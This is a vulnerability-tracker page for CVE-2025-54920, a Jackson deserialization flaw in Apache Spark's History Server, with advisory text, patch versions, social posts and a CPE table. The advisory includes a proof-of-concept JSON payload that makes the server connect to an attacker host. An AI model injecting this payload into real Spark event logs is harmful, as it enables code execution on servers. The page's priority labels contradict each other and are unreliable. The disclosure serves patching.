CVE-2025-54920Disclosure(apache / spark)

LOWCVSS 8.8 · HIGH

Signal is active with 7 mentions in latest observed window

Immediate actions

  • Patch apache spark systems immediately

Recommended action window: Monitor and triage in normal cycle

NVD description

This issue affects Apache Spark: before 3.5.7 and 4.0.1. Users are recommended to upgrade to version 3.5.7 or 4.0.1 and above, which fixes the issue. Summary Apache Spark 3.5.4 and earlier versions contain a code execution vulnerability in the Spark History Web UI due to overly permissive Jackson deserialization of event log data. This allows an attacker with access to the Spark event logs directory to inject malicious JSON payloads that trigger deserialization of arbitrary classes, enabling command execution on the host running the Spark History Server. Details The vulnerability arises because the Spark History Server uses Jackson polymorphic deserialization with @JsonTypeInfo.Id.CLASS on SparkListenerEvent objects, allowing an attacker to specify arbitrary class names in the event JSON. This behavior permits instantiating unintended classes, such as org.apache.hive.jdbc.HiveConnection, which can perform network calls or other malicious actions during deserialization. The attacker can exploit this by injecting crafted JSON content into the Spark event log files, which the History Server then deserializes on startup or when loading event logs. For example, the attacker can force the History Server to open a JDBC connection to a remote attacker-controlled server, demonstrating remote command injection capability. Proof of Concept: 1. Run Spark with event logging enabled, writing to a writable directory (spark-logs). 2. Inject the following JSON at the beginning of an event log file: { "Event": "org.apache.hive.jdbc.HiveConnection", "uri": "jdbc:hive2://<IP>:<PORT>/", "info": { "hive.metastore.uris": "thrift://<IP>:<PORT>" } } 3. Start the Spark History Server with logs pointing to the modified directory. 4. The Spark History Server initiates a JDBC connection to the attacker’s server, confirming the injection. Impact An attacker with write access to Spark event logs can execute arbitrary code on the server running the History Server, potentially compromising the entire system.

0.5/ 10 priority

Sources & remediation

Weakness type (CWE)
CWE-502

Priority

LOW

Exploitation

NONE

PoC

YES

Patch

AVAILABLE

Momentum

NONE

Are you affected?

If you run products in this scope, you should treat this CVE as relevant to your environment.

  • spark

Threat summary

  • Patch or workaround signal is available
  • 7 mentions across 1 observed day

What's happening

  • Patch or workaround mentioned in 1 signal
  • Technical details provided in 5 signals
  • Disclosure: 3 classified signals
  • General: 3 classified signals
  • 7 total mentions across 1 day

Affected systems

Vendors
Products
spark

2 versions affected across 1 product

Deep dive

Activity timeline7 mentions / 1d
02457Mentions · 2026-03-14: 7Patch / Workaround · 2026-03-14: 1Technical Details · 2026-03-14: 503-14
Signal classification3 categories
Disclosure
342.9%
General
342.9%
Patch
114.3%
Referenced assets8 URLs
Full discourse7 posts
  • Open Source Security mailing list@oss_security
    Disclosure

    CVE-2025-54920: Apache Spark: Spark History Server Code Execution Vulnerability https://www.openwall.com/lists/oss-security/2026/03/13/4 in the Spark History Web UI due to overly permissive Jackson deserialization of event log data

    Post summary

    The post discloses a code‑execution vulnerability (CVE‑2025‑54920) in Apache Spark's History Server caused by permissive Jackson deserialization, but it does not provide PoC, exploit code, or patch information.

    010531.4K
    4.4K followersView on X
  • CyberDudeBivash® | Global Cybersecurity Company@cyberbivash
    General

    🚨 CYBERDUDEBIVASH SENTINEL APEX ALERT 🚨 Threat: CVE-2025-54920 - Apache Spark: Spark History Server Code Execution Vulnerability Intel Report: https://ift.tt/BApbGSM

    Post summary

    Alert announces CVE‑2025‑54920, an Apache Spark History Server code execution vulnerability, and links to an Intel Report, but provides no exploitation or mitigation information.

    10010223
    337 followersView on X
  • Vulmon Vulnerability Feed@VulmonFeeds
    General

    CVE-2025-54920 CVE-2025-54920 https://vulmon.com/vulnerabilitydetails?qid=CVE-2025-54920 Customizable Vulnerability Alerts: https://alerts.vulmon.com/?utm_source=twitter&utm_medium=social&utm_campaign=2102281&utm_content=4

    Post summary

    The tweet merely notes CVE‑2025‑54920 and links to external pages for vulnerability details and alert services, offering no additional technical, exploit, or mitigation information.

    01010200
    4.0K followersView on X
  • CyberDudeBivash® | Global Cybersecurity Company@cyberbivash
    General

    🚨 CYBERDUDEBIVASH SENTINEL APEX ALERT 🚨 Threat: CVE-2025-54920 - Apache Spark: Spark History Server Code Execution Vulnerability Intel Report: https://ift.tt/08MtjVA

    Post summary

    The alert announces CVE-2025‑54920, a code‑execution flaw in Apache Spark History Server, and points to an Intel report, but offers no PoC, exploit, patch, or evidence of active exploitation.

    00000210
    337 followersView on X
  • CyberDudeBivash® | Global Cybersecurity Company@cyberbivash
    Disclosure

    🚨 CYBERDUDEBIVASH SENTINEL APEX ALERT 🚨 Threat: CVE-2025-54920 - Apache Spark: Spark History Server Code Execution Vulnerability Intel Report: https://ift.tt/e4yRSvC

    Post summary

    Alert announces CVE-2025-54920, a code‑execution vulnerability in Apache Spark’s History Server, with an Intel report linked but no PoC, exploit code, or patch details.

    00000197
    337 followersView on X
  • CyberDudeBivash® | Global Cybersecurity Company@cyberbivash
    Disclosure

    🚨 CYBERDUDEBIVASH SENTINEL APEX ALERT 🚨 Threat: CVE-2025-54920 - Apache Spark: Spark History Server Code Execution Vulnerability Intel Report: https://ift.tt/bPmNnjs

    Post summary

    The alert announces CVE-2025-54920, a code execution vulnerability in Apache Spark History Server, and provides a link to an Intel report for further details.

    00000198
    337 followersView on X
  • CVE@CVEnew
    Patch

    CVE-2025-54920 This issue affects Apache Spark: before 3.5.7 and 4.0.1. Users are recommended to upgrade to version 3.5.7 or 4.0.1 and above, which fixes the issue. Summary Ap… https://www.cve.org/CVERecord?id=CVE-2025-54920

    Post summary

    CVE-2025-54920 affects Apache Spark versions before 3.5.7 and 4.0.1; the advisory recommends upgrading to patched versions. No PoC, exploit, or active exploitation is mentioned.

    00000141
    56.7K followersView on X
CPE platform detail10 entries

10 of 10 entries

PartVendorProductVersionTarget SWTarget HW
Appapachespark---
Appapachespark4.0.0--
Appapachespark4.0.0--
Appapachespark4.0.0--
Appapachespark4.0.0--
Appapachespark4.0.0--
Appapachespark4.0.0--
Appapachespark4.0.0--
Appapachespark4.0.0--
Appapachespark4.0.1--

Explore more